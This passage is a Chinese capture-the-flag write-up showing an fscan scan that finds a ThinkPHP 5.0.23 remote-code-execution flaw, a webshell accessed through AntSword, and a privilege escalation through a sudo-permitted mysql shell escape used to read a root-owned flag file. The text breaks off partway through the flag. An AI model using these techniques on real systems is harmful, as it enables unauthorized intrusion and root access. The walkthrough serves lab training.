Initial

使用fscan扫描,

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
   ___                              _
  / _ \     ___  ___ _ __ __ _  ___| | __
 / /_\/____/ __|/ __| '__/ _` |/ __| |/ /
/ /_\\_____\__ \ (__| | | (_| | (__|   <
\____/     |___/\___|_|  \__,_|\___|_|\_\
                     fscan version: 1.8.4
start infoscan
39.99.142.78:80 open
39.99.142.78:22 open
[*] alive ports len is: 2
start vulscan
[*] WebTitle http://39.99.142.78       code:200 len:5578   title:Bootstrap Material Admin
[+] PocScan http://39.99.142.78 poc-yaml-thinkphp5023-method-rce poc1
已完成 2/2
[*] 扫描结束,耗时: 28.3778137s

发现存在 80端口的http和22端口的ssh服务,并且存在thinkphp rce漏洞。

使用软件执行命令。

f78cb10776e241c7508eabadbac481f3

发现无回显,于是写入后门再用蚁剑访问。用蚁剑打开虚拟终端,接下来就是要提权。

使用命令“sudo -l”可以发现我们自己是www-data权限。

1
2
3
4
5
(www-data:/var/www/html) $ sudo -l
Matching Defaults entries for www-data on ubuntu-web01:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ubuntu-web01:
    (root) NOPASSWD: /usr/bin/mysql

(root) NOPASSWD: /usr/bin/mysql

这说明我们可以通过通过 sudo 高权限运行 mysql,进而能够执行 root权 限才能执行的命令。

通过命令”sudo mysql -e ‘! cat /root/flag/flag01.txt’”

获得flag01:flag{60b53231-